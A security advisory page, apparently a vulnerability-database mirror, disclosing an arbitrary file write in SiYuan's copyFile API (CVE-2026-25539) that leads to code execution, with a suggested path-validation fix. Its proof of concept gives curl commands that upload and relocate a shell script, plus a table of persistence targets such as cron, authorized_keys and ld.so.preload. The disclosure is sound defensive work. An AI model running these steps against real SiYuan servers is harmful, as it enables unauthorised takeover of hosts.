GHSA-C4JR-5Q7W-F6R9

Vulnerability from github – Published: 2026-01-29 15:15 – Updated: 2026-02-05 00:36
VLAI?
Summary
SiYuan has Arbitrary File Write via /api/file/copyFile leading to RCE
Details

Summary

The /api/file/copyFile endpoint does not validate the dest parameter, allowing authenticated users to write files to arbitrary locations on the filesystem. This can lead to Remote Code Execution (RCE) by writing to sensitive locations such as cron jobs, SSH authorized_keys, or shell configuration files.

  • Affected Version: 3.5.3 (and likely all prior versions)

Details

  • Type: Improper Limitation of a Pathname to a Restricted Directory (CWE-22)
  • Location: kernel/api/file.go - copyFile function
// kernel/api/file.go lines 94-139
func copyFile(c *gin.Context) {
    // ...
    src := arg["src"].(string)
    src, err := model.GetAssetAbsPath(src)  // src is validated
    // ...

    dest := arg["dest"].(string)  // dest is NOT validated!
    if err = filelock.Copy(src, dest); err != nil {
        // ...
    }
}

The src parameter is properly validated via model.GetAssetAbsPath(), but the dest parameter accepts any absolute path without validation, allowing files to be written outside the workspace directory.

PoC

Step 1: Upload malicious content to workspace

curl -X POST "http://target:6806/api/file/putFile" \
  -H "Authorization: Token <API_TOKEN>" \
  -F "path=/data/assets/malicious.sh" \
  -F "file=@-;filename=malicious.sh" <<< '#!/bin/sh
id > /tmp/pwned.txt
hostname >> /tmp/pwned.txt'

Step 2: Copy to arbitrary location (e.g., /tmp)

curl -X POST "http://target:6806/api/file/copyFile" \
  -H "Authorization: Token <API_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"src": "assets/malicious.sh", "dest": "/tmp/malicious.sh"}'

Response: {"code":0,"msg":"","data":null}

Step 3: Verify file was written outside workspace

cat /tmp/malicious.sh
# Output: #!/bin/sh
#         id > /tmp/pwned.txt
#         hostname >> /tmp/pwned.txt

Attack Scenarios

Target Path Impact
/etc/cron.d/backdoor Scheduled command execution (RCE)
~/.ssh/authorized_keys Persistent SSH access
~/.bashrc Command execution on user login
/etc/ld.so.preload Shared library injection

RCE Demonstration

RCE was successfully demonstrated by writing a script and executing it:

# Write script to /tmp
curl -X POST "http://target:6806/api/file/copyFile" \
  -H "Authorization: Token <API_TOKEN>" \
  -d '{"src": "assets/malicious.sh", "dest": "/tmp/malicious.sh"}'

# Execute (simulating cron or login trigger)
sh /tmp/malicious.sh

# Result
cat /tmp/pwned.txt
# uid=0(root) gid=0(root) groups=0(root)...

Impact

An authenticated attacker (with API Token) can: 1. Achieve Remote Code Execution with the privileges of the SiYuan process 2. Establish persistent backdoor access via SSH keys 3. Compromise the entire host system 4. Access sensitive data on the same network (lateral movement)

Suggested Fix

Add path validation to ensure dest is within the workspace directory:

func copyFile(c *gin.Context) {
    // ...
    dest := arg["dest"].(string)

    // Add validation
    if !util.IsSubPath(util.WorkspaceDir, dest) {
        ret.Code = -1
        ret.Msg = "dest path must be within workspace"
        return
    }

    if err = filelock.Copy(src, dest); err != nil {
        // ...
    }
}

Solution

d7f790755edf8c78d2b4176171e5a0cdcd720feb

Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260126094835-d5d10dd41b0c"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25539"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-29T15:15:54Z",
    "nvd_published_at": "2026-02-04T22:16:00Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe `/api/file/copyFile` endpoint does not validate the `dest` parameter, allowing authenticated users to write files to arbitrary locations on the filesystem. This can lead to Remote Code Execution (RCE) by writing to sensitive locations such as cron jobs, SSH authorized_keys, or shell configuration files.\n\n- Affected Version: 3.5.3 (and likely all prior versions)\n\n## Details\n\n- Type: Improper Limitation of a Pathname to a Restricted Directory (CWE-22)\n- Location: `kernel/api/file.go` - copyFile function\n\n```go\n// kernel/api/file.go lines 94-139\nfunc copyFile(c *gin.Context) {\n    // ...\n    src := arg[\"src\"].(string)\n    src, err := model.GetAssetAbsPath(src)  // src is validated\n    // ...\n\n    dest := arg[\"dest\"].(string)  // dest is NOT validated!\n    if err = filelock.Copy(src, dest); err != nil {\n        // ...\n    }\n}\n```\n\nThe `src` parameter is properly validated via `model.GetAssetAbsPath()`, but the `dest` parameter accepts any absolute path without validation, allowing files to be written outside the workspace directory.\n\n## PoC\n\n### Step 1: Upload malicious content to workspace\n\n```bash\ncurl -X POST \"http://target:6806/api/file/putFile\" \\\n  -H \"Authorization: Token \u003cAPI_TOKEN\u003e\" \\\n  -F \"path=/data/assets/malicious.sh\" \\\n  -F \"file=@-;filename=malicious.sh\" \u003c\u003c\u003c \u0027#!/bin/sh\nid \u003e /tmp/pwned.txt\nhostname \u003e\u003e /tmp/pwned.txt\u0027\n```\n\n### Step 2: Copy to arbitrary location (e.g., /tmp)\n\n```bash\ncurl -X POST \"http://target:6806/api/file/copyFile\" \\\n  -H \"Authorization: Token \u003cAPI_TOKEN\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"src\": \"assets/malicious.sh\", \"dest\": \"/tmp/malicious.sh\"}\u0027\n```\n\nResponse: `{\"code\":0,\"msg\":\"\",\"data\":null}`\n\n### Step 3: Verify file was written outside workspace\n\n```bash\ncat /tmp/malicious.sh\n# Output: #!/bin/sh\n#         id \u003e /tmp/pwned.txt\n#         hostname \u003e\u003e /tmp/pwned.txt\n```\n\n## Attack Scenarios\n\n| Target Path | Impact |\n|-------------|--------|\n| `/etc/cron.d/backdoor` | Scheduled command execution (RCE) |\n| `~/.ssh/authorized_keys` | Persistent SSH access |\n| `~/.bashrc` | Command execution on user login |\n| `/etc/ld.so.preload` | Shared library injection |\n\n### RCE Demonstration\n\n RCE was successfully demonstrated by writing a script and executing it:\n\n```bash\n# Write script to /tmp\ncurl -X POST \"http://target:6806/api/file/copyFile\" \\\n  -H \"Authorization: Token \u003cAPI_TOKEN\u003e\" \\\n  -d \u0027{\"src\": \"assets/malicious.sh\", \"dest\": \"/tmp/malicious.sh\"}\u0027\n\n# Execute (simulating cron or login trigger)\nsh /tmp/malicious.sh\n\n# Result\ncat /tmp/pwned.txt\n# uid=0(root) gid=0(root) groups=0(root)...\n```\n\n## Impact\n\nAn authenticated attacker (with API Token) can:\n1. Achieve Remote Code Execution with the privileges of the SiYuan process\n2. Establish persistent backdoor access via SSH keys\n3. Compromise the entire host system\n4. Access sensitive data on the same network (lateral movement)\n\n## Suggested Fix\n\nAdd path validation to ensure `dest` is within the workspace directory:\n\n```go\nfunc copyFile(c *gin.Context) {\n    // ...\n    dest := arg[\"dest\"].(string)\n\n    // Add validation\n    if !util.IsSubPath(util.WorkspaceDir, dest) {\n        ret.Code = -1\n        ret.Msg = \"dest path must be within workspace\"\n        return\n    }\n\n    if err = filelock.Copy(src, dest); err != nil {\n        // ...\n    }\n}\n```\n\n## Solution\n\nd7f790755edf8c78d2b4176171e5a0cdcd720feb",
  "id": "GHSA-c4jr-5q7w-f6r9",
  "modified": "2026-02-05T00:36:43Z",
  "published": "2026-01-29T15:15:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c4jr-5q7w-f6r9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25539"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/d7f790755edf8c78d2b4176171e5a0cdcd720feb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan has Arbitrary File Write via /api/file/copyFile leading to RCE"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.